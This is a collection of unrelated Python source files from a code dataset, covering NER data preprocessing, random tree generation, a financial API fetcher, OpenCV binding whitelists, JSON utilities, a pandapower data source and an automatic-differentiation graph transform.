# content stringlengths 5 1.05M |
# |---|
from data_utils.clean_text import clean_text
from data_utils.constants import (B_TOKEN, CHARACTER_SEPARATOR, CLASSES,
I_TOKEN, SPLIT_TOKEN, TAGS,
WORD_TAG_SEPARATOR)
def transform_data(data, word_tokenizer, char_tokenizer):
    """Convert one tagged record into parallel word/char/label sequences.

    Args:
        data (dict): an object with a 'content' string and a 'tags' attribute:
            a mapping from startIdx to an object with keys 'type', 'end', 'prev'.
        word_tokenizer: fitted Keras-style tokenizer for words.
        char_tokenizer: fitted Keras-style tokenizer for characters.

    Returns:
        tuple of lists: (word ids, joined char ids per token, char lengths,
        BIO label ids), all as strings.

    NOTE(review): word ids come from texts_to_sequences on the whole segment
    while labels are emitted per whitespace token — assumes the tokenizer
    keeps one id per token; verify against the tokenizer's filters.
    """
    words, characters, char_length, labels = [], [], [], []
    text = data['content']
    tags = data['tags']
    # Tags are keyed by start offset (as strings); process them in order.
    for start in sorted(int(k) for k in tags):
        tag = tags[str(start)]
        tag_type = tag['type']
        segment, _ = clean_text(text[start:tag['end']])
        words.extend(
            str(w) for w in word_tokenizer.texts_to_sequences([segment])[0]
        )
        tokens = segment.split()
        for token in tokens:
            stripped = token.strip()
            char_ids = char_tokenizer.texts_to_sequences([stripped])[0]
            characters.append(
                CHARACTER_SEPARATOR.join(str(c) for c in char_ids)
            )
            char_length.append(str(len(stripped)))
        if tag_type == 'normal':
            # 'normal' spans get the same plain label for every token.
            labels.extend(CLASSES[TAGS[tag_type]] for _ in tokens)
        else:
            # BIO scheme: first token gets B-, the rest I-.
            for i, _ in enumerate(tokens):
                template = B_TOKEN if i == 0 else I_TOKEN
                labels.append(CLASSES[template.format(TAGS[tag_type])])
    return words, characters, char_length, labels
if __name__ == '__main__':
    import argparse
    import json
    import os
    import pickle

    import pandas as pd

    parser = argparse.ArgumentParser()
    parser.add_argument('--word_tokenizer', type=str,
                        default='./output/word_tokenizer.pkl')
    parser.add_argument('--char_tokenizer', type=str,
                        default='./output/char_tokenizer.pkl')
    parser.add_argument('--output', type=str, default='./output/data')
    parser.add_argument('--input', type=str, default='./data/train')
    args = parser.parse_args()

    with open(args.word_tokenizer, 'rb') as file:
        word_tokenizer = pickle.load(file)
    with open(args.char_tokenizer, 'rb') as file:
        char_tokenizer = pickle.load(file)

    # FIX: the original reused the name `data` for both the filename list
    # and each file's parsed contents; distinct names make the flow clear.
    filenames = [name for name in os.listdir(args.input)
                 if name.endswith('.json')]
    class_count = {}
    for filename in filenames:
        with open(os.path.join(args.input, filename), 'r') as file:
            records = json.load(file)
        for i, record in enumerate(records):
            if 'tags' not in record:
                continue
            # Tally how often each tag type occurs across the corpus.
            for tag in record['tags'].values():
                tag_type = tag['type']
                if tag_type in class_count:
                    class_count[tag_type]['count'] += 1
                else:
                    class_count[tag_type] = {'count': 1}
            path = os.path.join(args.output, filename.split('.')[0])
            if not os.path.exists(path):
                os.makedirs(path)
            # One output file per record: word-id, char-ids, char-length and
            # label columns, tab-separated, records joined by SPLIT_TOKEN.
            with open(os.path.join(path, '{}.txt'.format(i)), 'w') as file:
                a, b, c, d = transform_data(
                    record, word_tokenizer, char_tokenizer
                )
                file.write(SPLIT_TOKEN.join('\t'.join(token)
                                            for token in zip(a, b, c, d)))
    final_counts = pd.DataFrame.from_dict(class_count, 'index')
    final_counts.to_csv('output/class_count.csv')
    print(final_counts)
# | (file-boundary separator from dataset extraction)
# -*- coding: utf-8 -*-
import random
import Vertex
import numpy as np
class Tree():
    """A random tree on `size` vertices.

    Vertices are split into two sides A = [0, size_A) and B = [size_A, size),
    edges are only added between the two sides, and candidates are
    re-generated until BFS confirms the result is connected with exactly
    size - 1 edges (i.e. a tree).

    NOTE(review): the attributes below are class-level defaults shared until
    an instance assigns its own; Tree(0) returns immediately and relies on
    this, and SubGraph() then fills the empty shell manually.
    """

    size_of_v = 0          # |V|
    size_of_e = 0          # |E| (== |V| - 1 for a tree)
    V = np.array([], Vertex.Vertex)   # vertex objects
    E = None               # adjacency matrix (size x size)
    origin = 0             # size the tree was originally generated with
    max_deg_v = None       # a vertex of maximal degree (Vertex type)

    # Random Tree Generator:
    def __init__(self, size):
        """Generate a random tree with `size` vertices (0 => empty shell)."""
        if size == 0:
            return
        self.size_of_v = size
        self.size_of_e = size - 1
        self.origin = size
        maximum_degree = 0
        much_left = self.size_of_e      # edges still to place
        size_A = random.randint(1, size - 1)
        size_B = size - size_A
        is_good = False
        while not is_good:
            self.E = np.zeros((size, size))
            for i in range(0, size):
                self.V = np.insert(self.V, i, Vertex.Vertex(i, 0))
            A_index = 0
            B_index = size_A
            self.max_deg_v = self.V[0]
            if size_A >= size_B:
                # Seed: give every B vertex one edge to a distinct A vertex.
                for i in range(B_index, size):
                    # Index 'i' represents the B side.
                    self.E[A_index][i] = True
                    self.E[i][A_index] = True
                    self.V[i].AddNei(A_index)
                    self.V[A_index].AddNei(i)
                    much_left -= 1
                    A_index += 1
                # Place the remaining edges at random between the sides.
                while much_left != 0:
                    if A_index == size_A:
                        A_index = 0
                    x = random.randint(size_A, size - 1)  # x: index on side B.
                    if self.E[A_index][x]:
                        A_index += 1
                        continue
                    much_left -= 1
                    self.E[A_index][x] = True
                    self.E[x][A_index] = True
                    self.V[x].AddNei(A_index)
                    self.V[A_index].AddNei(x)
                    # Track the maximum-degree vertex as edges are added.
                    if self.V[x].degree > maximum_degree:
                        maximum_degree = self.V[x].degree
                        self.max_deg_v = self.V[x]
                    if self.V[A_index].degree > maximum_degree:
                        maximum_degree = self.V[A_index].degree
                        self.max_deg_v = self.V[A_index]
                    A_index += 1
            # ************************* End Of 1st condition ************
            else:
                # Symmetric case: seed from the A side first.
                for i in range(0, size_A):
                    # Index 'i' represents the A side.
                    self.E[B_index][i] = True
                    self.E[i][B_index] = True
                    self.V[i].AddNei(B_index)
                    self.V[B_index].AddNei(i)
                    B_index += 1
                    much_left -= 1
                while much_left != 0:
                    if B_index == size:
                        B_index = size_A
                    x = random.randint(0, size_A - 1)  # x: index on side A.
                    if self.E[B_index][x]:
                        B_index += 1
                        continue
                    much_left -= 1
                    self.E[B_index][x] = True
                    self.E[x][B_index] = True
                    self.V[x].AddNei(B_index)
                    self.V[B_index].AddNei(x)
                    if self.V[x].degree > maximum_degree:
                        maximum_degree = self.V[x].degree
                        self.max_deg_v = self.V[x]
                    if self.V[B_index].degree > maximum_degree:
                        maximum_degree = self.V[B_index].degree
                        self.max_deg_v = self.V[B_index]
                    B_index += 1
            # ************************ End of 2nd Condition ******************************
            is_good = self.BFS(size)
            if not is_good:
                # Not a tree: reset and try a fresh random candidate.
                self.V = np.array([], Vertex.Vertex)
                maximum_degree = 0
    # ************************************ End of __init__ ***************************************

    def SubGraph(self, index_to_remove: Vertex.Vertex, x_or_nx: bool):
        """Return a copy of this tree with `index_to_remove` deleted.

        x_or_nx=True removes only the vertex (T - x); False removes the
        vertex and all its neighbors (T - N[x]).
        """
        newT = Tree(0)
        newT.size_of_v = self.size_of_v
        newT.V = np.array(self.V, Vertex.Vertex)
        newT.origin = self.origin
        newT.size_of_e = self.size_of_e
        newT.max_deg_v = newT.V[0]
        maxi = 0
        if x_or_nx:  # T - x, xEV
            for v in newT.V:
                if v.AreNeighbors(index_to_remove.ind):
                    v.RemoveNeigh(index_to_remove.ind)
                    newT.size_of_e -= 1
                if v.GetDegree() > maxi and v.ind != index_to_remove.ind:
                    maxi = v.GetDegree()
                    newT.max_deg_v = v
            # NOTE(review): relies on Vertex.__eq__ comparing against the
            # removed vertex object — confirm in Vertex.
            newT.V = newT.V[newT.V != index_to_remove]
            newT.size_of_v -= 1
        # T - N[x], xEV
        else:
            newT.size_of_v -= 1
            tmpo_to_remove = []
            # NOTE(review): newT.V is reassigned while the loop iterates the
            # original array object; numpy keeps iterating the old array, so
            # every original vertex is still visited — confirm intended.
            for v in newT.V:
                if v.AreNeighbors(index_to_remove.ind):
                    tmpo_to_remove.append(v.ind)
                    newT.V = newT.V[newT.V != v]
                    newT.size_of_v -= 1
            newT.V = newT.V[newT.V != index_to_remove.ind]
            # Strip dangling references to the removed neighborhood.
            for v in newT.V:
                for index in tmpo_to_remove:
                    if v.AreNeighbors(index):
                        v.RemoveNeigh(index)
                        newT.size_of_e -= 1
                if v.GetDegree() > maxi and v.ind != index_to_remove.ind:
                    maxi = v.GetDegree()
                    newT.max_deg_v = v
        return newT

    def BFS(self, size):
        """Breadth-first search from vertex 0.

        Returns True iff the graph in self.E is a tree: every vertex is
        reached and exactly self.size_of_e distinct edges are traversed.

        BUG FIX: np.insert returns a new array — it never mutates its
        argument — so the original discarded every enqueue; the root was
        never in the queue and the first dequeue raised IndexError. The
        results are now assigned back, and the loop bound is `< Que.size`
        (the original `<=` read one past the end on disconnected graphs).
        """
        color = np.repeat(0, self.size_of_v)   # 0=white, 1=gray, 2=black
        num_of_nil = size                      # vertices not yet discovered
        num_of_e = 0                           # tree edges traversed
        color[0] = 1
        Que = np.array([0], int)               # FIX: actually enqueue the root
        Q_index = 0
        while Q_index < self.size_of_v and Q_index < Que.size:
            for i in range(0, self.size_of_v):
                if self.E[i][Que[Q_index]] and color[i] == 0:
                    Que = np.insert(Que, Que.size, i)  # FIX: keep the result
                    color[i] = 1
                    num_of_e += 1
                    num_of_nil -= 1
            color[Que[Q_index]] = 2
            Q_index += 1
        # The root is colored but never decremented, hence the `!= 1`.
        if num_of_nil != 1 or num_of_e != self.size_of_e:
            return False
        return True
    # ***************************** End Of BFS *************************************

    def isKn(self):
        """True iff the edge count matches a complete graph on |V| vertices."""
        return self.size_of_e == (self.size_of_v * (self.size_of_v - 1) / 2)

    def print_rel(self):
        """Print |V| and every edge of the upper adjacency triangle."""
        print("|V| = {0}".format(self.size_of_v))
        print("E = ")
        for i in range(0, self.size_of_v):
            for j in range(i, self.size_of_v):
                if self.E[i][j]:
                    print('[ V{0}, V{1} ], '.format(i, j))
# | (file-boundary separator from dataset extraction)
from urllib.request import urlopen
from urllib.error import HTTPError
import json
import pandas as pd
BASE_URL = "https://financialmodelingprep.com/api"
def download(URL):
    """Fetch a JSON endpoint and return its payload as a DataFrame.

    Args:
        URL (str): full API URL to request.

    Returns:
        pandas.DataFrame built from the decoded JSON.

    Raises:
        ValueError: on any HTTP error (the API signals premium-only
            endpoints this way) or when the payload carries an
            'Error Message' entry.
    """
    try:
        # FIX: close the HTTP response deterministically instead of
        # leaking the socket until garbage collection.
        with urlopen(URL) as response:
            data = json.loads(response.read().decode("utf-8"))
    except HTTPError:
        raise ValueError("This endpoint is only for premium members. Please visit the subscription page to upgrade the "
                         "plan (Starter or higher) at https://financialmodelingprep.com/developer/docs/pricing")
    if 'Error Message' in data:
        raise ValueError(data['Error Message'])
    return pd.DataFrame(data)
# | (file-boundary separator from dataset extraction)
# Classes and methods whitelist
# Each dict maps a class name (or '' for free functions) within an OpenCV
# module to the list of methods/functions exposed to the bindings.

# Core array operations and the Algorithm base class.
core = {'': ['absdiff', 'add', 'addWeighted', 'bitwise_and', 'bitwise_not', 'bitwise_or', 'bitwise_xor', 'cartToPolar',
             'compare', 'convertScaleAbs', 'copyMakeBorder', 'countNonZero', 'determinant', 'dft', 'divide', 'eigen',
             'exp', 'flip', 'getOptimalDFTSize', 'gemm', 'hconcat', 'inRange', 'invert', 'kmeans', 'log', 'magnitude',
             'max', 'mean', 'meanStdDev', 'merge', 'min', 'minMaxLoc', 'mixChannels', 'multiply', 'norm', 'normalize',
             'perspectiveTransform', 'polarToCart', 'pow', 'randn', 'randu', 'reduce', 'repeat', 'rotate', 'setIdentity', 'setRNGSeed',
             'solve', 'solvePoly', 'split', 'sqrt', 'subtract', 'trace', 'transform', 'transpose', 'vconcat'],
        'Algorithm': []}

# Image processing: filtering, geometric transforms, contours, histograms.
imgproc = {'': ['Canny', 'GaussianBlur', 'Laplacian', 'HoughLines', 'HoughLinesP', 'HoughCircles', 'Scharr', 'Sobel',
                'adaptiveThreshold', 'approxPolyDP', 'arcLength', 'bilateralFilter', 'blur', 'boundingRect', 'boxFilter',
                'calcBackProject', 'calcHist', 'circle', 'compareHist', 'connectedComponents', 'connectedComponentsWithStats',
                'contourArea', 'convexHull', 'convexityDefects', 'cornerHarris', 'cornerMinEigenVal', 'createCLAHE',
                'createLineSegmentDetector', 'cvtColor', 'demosaicing', 'dilate', 'distanceTransform', 'distanceTransformWithLabels',
                'drawContours', 'ellipse', 'ellipse2Poly', 'equalizeHist', 'erode', 'filter2D', 'findContours', 'fitEllipse',
                'fitLine', 'floodFill', 'getAffineTransform', 'getPerspectiveTransform', 'getRotationMatrix2D', 'getStructuringElement',
                'goodFeaturesToTrack', 'grabCut', 'initUndistortRectifyMap', 'integral', 'integral2', 'isContourConvex', 'line',
                'matchShapes', 'matchTemplate', 'medianBlur', 'minAreaRect', 'minEnclosingCircle', 'moments', 'morphologyEx',
                'pointPolygonTest', 'putText', 'pyrDown', 'pyrUp', 'rectangle', 'remap', 'resize', 'sepFilter2D', 'threshold',
                'undistort', 'warpAffine', 'warpPerspective', 'warpPolar', 'watershed',
                'fillPoly', 'fillConvexPoly'],
           'CLAHE': ['apply', 'collectGarbage', 'getClipLimit', 'getTilesGridSize', 'setClipLimit', 'setTilesGridSize']}

# Object detection: HOG and cascade classifiers.
objdetect = {'': ['groupRectangles'],
             'HOGDescriptor': ['load', 'HOGDescriptor', 'getDefaultPeopleDetector', 'getDaimlerPeopleDetector', 'setSVMDetector', 'detectMultiScale'],
             'CascadeClassifier': ['load', 'detectMultiScale2', 'CascadeClassifier', 'detectMultiScale3', 'empty', 'detectMultiScale']}

# Video analysis: tracking, optical flow, background subtraction.
video = {'': ['CamShift', 'calcOpticalFlowFarneback', 'calcOpticalFlowPyrLK', 'createBackgroundSubtractorMOG2',
              'findTransformECC', 'meanShift'],
         'BackgroundSubtractorMOG2': ['BackgroundSubtractorMOG2', 'apply'],
         'BackgroundSubtractor': ['apply', 'getBackgroundImage']}

# Deep neural network module: model loading and inference.
dnn = {'dnn_Net': ['setInput', 'forward'],
       '': ['readNetFromCaffe', 'readNetFromTensorflow', 'readNetFromTorch', 'readNetFromDarknet',
            'readNetFromONNX', 'readNet', 'blobFromImage']}

# 2D feature detectors, descriptor extractors and matchers.
features2d = {'Feature2D': ['detect', 'compute', 'detectAndCompute', 'descriptorSize', 'descriptorType', 'defaultNorm', 'empty', 'getDefaultName'],
              'BRISK': ['create', 'getDefaultName'],
              'ORB': ['create', 'setMaxFeatures', 'setScaleFactor', 'setNLevels', 'setEdgeThreshold', 'setFirstLevel', 'setWTA_K', 'setScoreType', 'setPatchSize', 'getFastThreshold', 'getDefaultName'],
              'MSER': ['create', 'detectRegions', 'setDelta', 'getDelta', 'setMinArea', 'getMinArea', 'setMaxArea', 'getMaxArea', 'setPass2Only', 'getPass2Only', 'getDefaultName'],
              'FastFeatureDetector': ['create', 'setThreshold', 'getThreshold', 'setNonmaxSuppression', 'getNonmaxSuppression', 'setType', 'getType', 'getDefaultName'],
              'AgastFeatureDetector': ['create', 'setThreshold', 'getThreshold', 'setNonmaxSuppression', 'getNonmaxSuppression', 'setType', 'getType', 'getDefaultName'],
              'GFTTDetector': ['create', 'setMaxFeatures', 'getMaxFeatures', 'setQualityLevel', 'getQualityLevel', 'setMinDistance', 'getMinDistance', 'setBlockSize', 'getBlockSize', 'setHarrisDetector', 'getHarrisDetector', 'setK', 'getK', 'getDefaultName'],
              'SimpleBlobDetector_Params': ['Params'],
              'SimpleBlobDetector': ['create'],
              'KAZE': ['create', 'setExtended', 'getExtended', 'setUpright', 'getUpright', 'setThreshold', 'getThreshold', 'setNOctaves', 'getNOctaves', 'setNOctaveLayers', 'getNOctaveLayers', 'setDiffusivity', 'getDiffusivity', 'getDefaultName'],
              'AKAZE': ['create', 'setDescriptorType', 'getDescriptorType', 'setDescriptorSize', 'getDescriptorSize', 'setDescriptorChannels', 'getDescriptorChannels', 'setThreshold', 'getThreshold', 'setNOctaves', 'getNOctaves', 'setNOctaveLayers', 'getNOctaveLayers', 'setDiffusivity', 'getDiffusivity', 'getDefaultName'],
              'DescriptorMatcher': ['add', 'clear', 'empty', 'isMaskSupported', 'train', 'match', 'knnMatch', 'radiusMatch', 'clone', 'create'],
              'BFMatcher': ['isMaskSupported', 'create'],
              '': ['drawKeypoints', 'drawMatches', 'drawMatchesKnn']}

# Computational photography: HDR merging, tone mapping, inpainting.
photo = {'': ['createAlignMTB', 'createCalibrateDebevec', 'createCalibrateRobertson',
              'createMergeDebevec', 'createMergeMertens', 'createMergeRobertson',
              'createTonemapDrago', 'createTonemapMantiuk', 'createTonemapReinhard', 'inpaint'],
         'CalibrateCRF': ['process'],
         'AlignMTB': ['calculateShift', 'shiftMat', 'computeBitmaps', 'getMaxBits', 'setMaxBits',
                      'getExcludeRange', 'setExcludeRange', 'getCut', 'setCut'],
         'CalibrateDebevec': ['getLambda', 'setLambda', 'getSamples', 'setSamples', 'getRandom', 'setRandom'],
         'CalibrateRobertson': ['getMaxIter', 'setMaxIter', 'getThreshold', 'setThreshold', 'getRadiance'],
         'MergeExposures': ['process'],
         'MergeDebevec': ['process'],
         'MergeMertens': ['process', 'getContrastWeight', 'setContrastWeight', 'getSaturationWeight',
                          'setSaturationWeight', 'getExposureWeight', 'setExposureWeight'],
         'MergeRobertson': ['process'],
         'Tonemap': ['process', 'getGamma', 'setGamma'],
         'TonemapDrago': ['getSaturation', 'setSaturation', 'getBias', 'setBias',
                          'getSigmaColor', 'setSigmaColor', 'getSigmaSpace', 'setSigmaSpace'],
         'TonemapMantiuk': ['getScale', 'setScale', 'getSaturation', 'setSaturation'],
         'TonemapReinhard': ['getIntensity', 'setIntensity', 'getLightAdaptation', 'setLightAdaptation',
                             'getColorAdaptation', 'setColorAdaptation']
         }

# ArUco fiducial marker detection and pose estimation.
aruco = {'': ['detectMarkers', 'drawDetectedMarkers', 'drawAxis', 'estimatePoseSingleMarkers', 'estimatePoseBoard', 'estimatePoseCharucoBoard', 'interpolateCornersCharuco', 'drawDetectedCornersCharuco'],
         'aruco_Dictionary': ['get', 'drawMarker'],
         'aruco_Board': ['create'],
         'aruco_GridBoard': ['create', 'draw'],
         'aruco_CharucoBoard': ['create', 'draw'],
         }

# Camera calibration and 3D reconstruction.
calib3d = {'': ['findHomography', 'calibrateCameraExtended', 'drawFrameAxes', 'estimateAffine2D', 'getDefaultNewCameraMatrix', 'initUndistortRectifyMap', 'Rodrigues']}

# makeWhiteList is not defined in this file — presumably injected by the
# binding generator that consumes this config; verify against the build.
white_list = makeWhiteList([core, imgproc, objdetect, video, dnn, features2d, photo, aruco, calib3d])
# | (file-boundary separator from dataset extraction)
import json
from datetime import datetime
import inspect
import json
from .logger import logger
def pretty(x):
    """Pretty-print *x* as 4-space-indented JSON; returns None."""
    return print(json.dumps(x, indent=4, default=str))
def prettify(x):
    """Return *x* serialized as 4-space-indented JSON (falls back to str())."""
    return json.dumps(x, indent=4, default=str)
def function_name():
    """Return the name of the function that called this helper."""
    return inspect.stack()[1][3]
def dumps(x, indent=0):
    """Serialize *x* as indented JSON, shifting every line right by *indent* spaces."""
    pad = indent * ' '
    rendered = json.dumps(x, indent=4, default=str)
    return '\n'.join(pad + line for line in rendered.split('\n'))
def log(x):
    """Print *x* as 4-space-indented JSON (same as pretty); returns None."""
    return print(json.dumps(x, indent=4, default=str))
def dicts_set(a, b, unique_props):
    """Merge two lists of dicts, deduplicated by the values of *unique_props*.

    Entries from *b* take precedence over entries from *a* with the same key.
    """
    def key_of(d):
        return tuple(d.get(prop) for prop in unique_props)

    merged = {key_of(d): d for d in a}
    merged.update({key_of(d): d for d in b})
    return list(merged.values())
def round_time_to(timestamp, seconds=60*30):
    """Floor *timestamp* (seconds since epoch) to a multiple of *seconds*."""
    whole = int(timestamp)
    return whole - whole % seconds
if __name__ == '__main__':
    # Smoke test: round a series of recent timestamps down to the hour
    # and print them, to eyeball round_time_to's behavior.
    for i in range(20):
        t = round_time_to(datetime.utcnow().timestamp() - 60*23*i, 60*60)
        print(datetime.fromtimestamp(t))
# | (file-boundary separator from dataset extraction)
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2019 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
try:
    import pplog
except ImportError:
    # FIX: narrowed from a bare `except:` — only a missing pplog should
    # trigger the fallback to the stdlib logging module.
    import logging as pplog
import datetime
from pandapower.io_utils import JSONSerializableClass

logger = pplog.getLogger(__name__)
class DataSource(JSONSerializableClass):
    """Base class for time-series value providers.

    A concrete data source may read a profile, generate values at random,
    or return constants. Controllers call get_time_step_value(time) each
    time step to obtain new values for e.g. P, Q.
    """

    def __str__(self):
        return type(self).__name__

    def __repr__(self):
        return type(self).__name__

    def get_time_step_value(self, time_step, profile_name, scale_factor=1.0):
        """Look up the value of *profile_name* at *time_step*, scaled.

        Concrete data sources must override this; see the subclass you are
        actually using for the parameter semantics.
        """
        raise NotImplementedError("Subclasses should implement this!")
class FileData(DataSource):
    """Data source backed by a file of time-indexed profiles.

    Controllers call get_time_step_value(time) in each time step to get
    new values for e.g. P, Q from the loaded dataframe.
    | **path** - The path to a HDF5-File, containing the data
    | **time_res** - Desired time resolution in minutes (default = will infer from timestamps)
    """

    def __init__(self, resolution_sec=None, profile_span="epoch"):
        super().__init__()
        # The dataframe is populated later via add_file() in subclasses.
        self.time_df = None
        self.profile_span = profile_span
        self.resolution_sec = resolution_sec
        self.update_initialized(locals())

    def add_file(self, path):
        """Add the contents of *path* to the dataframe of this DataSource."""
        raise NotImplementedError("Subclasses should implement this!")

    def get_time_step_value(self, time_step, profile_name, scale_factor=1.0):
        """Return the profile value for the given time step, scaled.

        | **time_step** - The time step for which we want to look up values
        | **profile_name** - The name of the columns for each profile
        | **scale_factor** - A scale factor.
        """
        span = self.profile_span.lower()
        if span in ("month", "day"):
            # Fold the absolute timestamp into an offset within the month
            # or day, since we only have a short repeating profile.
            moment = datetime.datetime.fromtimestamp(time_step)
            row = moment.hour * 3600 + moment.minute * 60 + moment.second
            if span == "month":
                row += (moment.day - 1) * 86400
        else:
            row = time_step
        try:
            return self.time_df.at[row, profile_name] * scale_factor
        except Exception as e:
            # Best-effort: log the lookup failure and fall back to zero.
            logger.warning("Could not read value at profile %s, row %i. Error: %s" % (
                str(profile_name), row, e.args))
            return 0.0
# | (file-boundary separator from dataset extraction)
"""Generate the gradient graphs for reverse mode.
The J transform on a graph produces two graphs, the forward graph (fprop)
and the backpropagator graph (bprop). The former returns the result of the
computation and the bprop graph, and the latter takes output sensitivities
and returns input sensitivities. For each node `y = f(x)` of the graph,
we generate:
* Three nodes in the fprop graph, using one GraphRemapper and two
SlaveRemappers (it doesn't really matter which one is the master and
which ones are the slaves):
temp = fprop_f(fprop_x) # FPropAppRemapper (slave)
fprop_y = temp[0] # FPropRemapper (master)
bprop_y = temp[1] # BPropRemapper (slave)
* Two nodes in the bprop graph, using one GraphRemapper and one
SlaveRemapper:
# BPropAppRemapper (slave)
from_y = bprop_y(sens_y)
# SensRemapper (master)
sens_y = hyper_add(from_z[idx] for z, idx in uses(y))
* For the output node, in the fprop graph, we generate:
return fprop_y, bprop_y
* The output of the bprop graph contains the sensitivities of
the free variables and parameters. Sensitivities for free variables
are stored in an Env:
sens_allfvs = env_setitem(newenv, embed(fv1), sens_fv1)
sens_allfvs = env_setitem(sens_allfvs, embed(fv2), sens_fv2)
...
return sens_allfvs, sens_param1, sens_param_2, ...
All remappers generate their nodes first, and then the nodes are linked
with each other, which allows them to refer to each other.
SensRemapper is the most complex one, mainly because it walks through
each node's uses and has to deal with free variables. For any given node,
SensRemapper will generate a sensitivity node in each graph that uses
it, so e.g. in `lambda x: x + (lambda y: x + y)(123)` two different
sensitivity nodes are created for x, because it is used in both lambda
expressions. See `SensRemapper.link_apply` for more information.
"""
from functools import reduce
from ovld import ovld
from . import operations
from .debug.label import short_labeler, short_relation_symbols as syms
from .info import About, NamedDebugInfo
from .ir import (
BasicRemapper,
Constant,
Graph,
RemapperSet,
clone,
manage,
sexp_to_node,
)
from .operations import Primitive, gadd, primitives as P, zeros_like
from .parser import operations_ns
from .utils import InternalInferenceError, OrderedSet, newenv
from .utils.variables import Xs
class GradRemapper(BasicRemapper):
    """GraphRemapper that allows mapping free variables differently."""

    def get(self, g, node):
        """Return the new node for a use of *node* from graph *g*.

        The (g, node) pair corresponds to a use of a node from graph g;
        the node may or may not belong to g. Lookup tries the per-graph
        (g, node) entry first, then the node alone.
        """
        for key in ((g, node), node):
            if key in self.repl:
                return self.repl[key]
        raise AssertionError(f"Unprocessed node: {node}")
class SlaveRemapper(GradRemapper):
    """Remapper that emits its nodes into another remapper's graphs.

    Arguments:
        graphs: The graphs to transform.
        master: The name of the remapper whose graphs receive the nodes
            this remapper generates.
        relation: The relation between the original node and the new node.
        remappers (Optional): A RemapperSet for if the remapped nodes need
            to refer to nodes in other remappers.
        graph_relation (Optional): The relation between the original graph
            and the new graph (defaults to relation).
    """

    def __init__(
        self, graphs, master, *, relation, remappers=None, graph_relation=None
    ):
        """Initialize a SlaveRemapper."""
        super().__init__(
            graphs,
            remappers=remappers,
            relation=relation,
            graph_relation=graph_relation,
        )
        self._master_name = master

    @property
    def master(self):
        """The remapper providing the graphs to generate into."""
        return self.remappers[self._master_name]

    def gen_parameter(self, g, ng, p):
        """No-op: parameters are generated by the master."""

    def gen_constant(self, g, ng, ct):
        """No-op: constants are generated by the master."""

    def generate(self):
        """Share the master's graph_repl instead of building our own."""
        self.graph_repl = self.master.graph_repl

    def finalize(self):
        """No-op: only the master finalizes."""
class FPropAppRemapper(SlaveRemapper):
    """Generate applications in the forward graph.

    This is transform A, generating into transform B's graph.
    x = a(b, c) => A:x = (B:a)(B:b, B:c)
    """

    def link_apply(self, link):
        """Wire A:x's inputs to the B-mapped versions of x's inputs.

        x = a(b, c) => A:x = (B:a)(B:b, B:c)
        """
        fprop = self.remappers["grad_fprop"]
        link.new_node.inputs = [
            fprop.get(link.graph, inp) for inp in link.node.inputs
        ]
class FPropRemapper(GradRemapper):
    """Generate nodes in the forward graph.
    This is transform B.
    x = a(b, c) => B:x = (A:x)[0]
    """
    def gen_constant(self, g, ng, ct):
        """Constants are wrapped with a call to J."""
        with About(ct.debug, self.relation):
            # Keyed per (g, ct): the same constant used by several graphs
            # gets one J-wrapped node in each graph's fprop.
            self.repl[(g, ct)] = sexp_to_node((P.J, ct), ng)
    def gen_constant_graph(self, g, ng, ct):
        """Constant graphs map to their remapped versions.
        Graphs that are not remapped are wrapped with J.
        """
        if ct.value in self.graphs:
            # Register both the constant and the graph itself, so either
            # lookup form in get() resolves to the new constant.
            new_ct = Constant(self.get_graph(ct.value))
            self.repl[ct] = new_ct
            self.repl[ct.value] = new_ct
        else:
            self.gen_constant(g, ng, ct)
    def gen_fv(self, g, ng, fv):
        """Free variables outside the remapped scope are wrapped with J.
        Remapped free variables are remapped elsewhere.
        """
        if fv.graph not in self.graphs:
            return self.gen_constant(g, ng, fv)
    def gen_fv_graph(self, g, ng, fvg):
        """Free variables that are graphs are handled like constants."""
        if fvg in self.graphs:
            return self.gen_constant_graph(g, ng, Constant(fvg))
        else:
            return self.gen_constant(g, ng, fvg)
    def link_apply(self, link):
        """Link generated nodes to their inputs.
        x = a(b, c) => B:x = (A:x)[0]
        """
        assert not link.node.is_parameter()
        app = self.remappers["grad_fprop_app"].get(link.graph, link.node)
        # Copy the inputs of the (tuple_getitem A:x 0) expression into the
        # pre-created node instead of replacing the node object itself.
        link.new_node.inputs = sexp_to_node(
            (P.tuple_getitem, app, 0), link.new_graph
        ).inputs
    def finalize_graph(self, g, ng):
        """We generate the pair (B:output, E:g)."""
        # Record the primal/grad relationship in both directions so later
        # passes can navigate between original and transformed graphs.
        g.transforms["grad"] = ng
        ng.transforms["primal"] = g
        g.set_flags("reference")
        ng.set_flags("reference")
        out = self.get(g, g.output)
        bprop = self.remappers["grad_sens"].get_graph(g)
        ng.output = ng.apply(P.make_tuple, out, bprop)
    def get_jinv(self, node):
        """Generate Jinv(B:node)."""
        # Cached under (node, "jinv") so each node is wrapped only once.
        if (node, "jinv") not in self.repl:
            if isinstance(node, Graph):
                if node not in self.graphs:
                    # Graph outside the transformed scope: use it as-is.
                    new_node = Constant(node)
                else:
                    assert node.parent is not None
                    ng = self.get_graph(node.parent)
                    ct = Constant(self.get_graph(node))
                    with About(node.debug, "equiv"):
                        new_node = ng.apply(P.Jinv, ct)
            else:
                if node.graph not in self.graphs:
                    # Node outside the transformed scope: use it as-is.
                    new_node = node
                else:
                    ng = self.get_graph(node.graph)
                    node2 = self.get(None, node)
                    with About(node.debug, "equiv"):
                        new_node = ng.apply(P.Jinv, node2)
            self.repl[node, "jinv"] = new_node
        return self.repl[node, "jinv"]
class BPropRemapper(SlaveRemapper):
    """Generate backpropagators in the forward graph.

    This is transform C.
    x = a(b, c) => C:x = (A:x)[1]
    """

    def link_apply(self, link):
        """Wire C:x to extract element 1 of the fprop application A:x.

        x = a(b, c) => C:x = (A:x)[1]
        """
        fprop_app = self.remappers["grad_fprop_app"].get(link.graph, link.node)
        sexp = (P.tuple_getitem, fprop_app, 1)
        link.new_node.inputs = sexp_to_node(sexp, link.new_graph).inputs
class BPropAppRemapper(SlaveRemapper):
    """Generate the reverse applications in the backward graph.

    This is transform D, generating into transform E's graph.
    x = a(b, c) => D:x = (C:x)(E:x)
    """

    def link_apply(self, link):
        """Wire D:x as the backpropagator C:x applied to the sensitivity E:x.

        x = a(b, c) => D:x = (C:x)(E:x)
        """
        graph, node = link.graph, link.node
        assert not node.is_parameter()
        link.new_node.inputs = [
            self.remappers["grad_bprop"].get(graph, node),
            self.remappers["grad_sens"].get(graph, node),
        ]
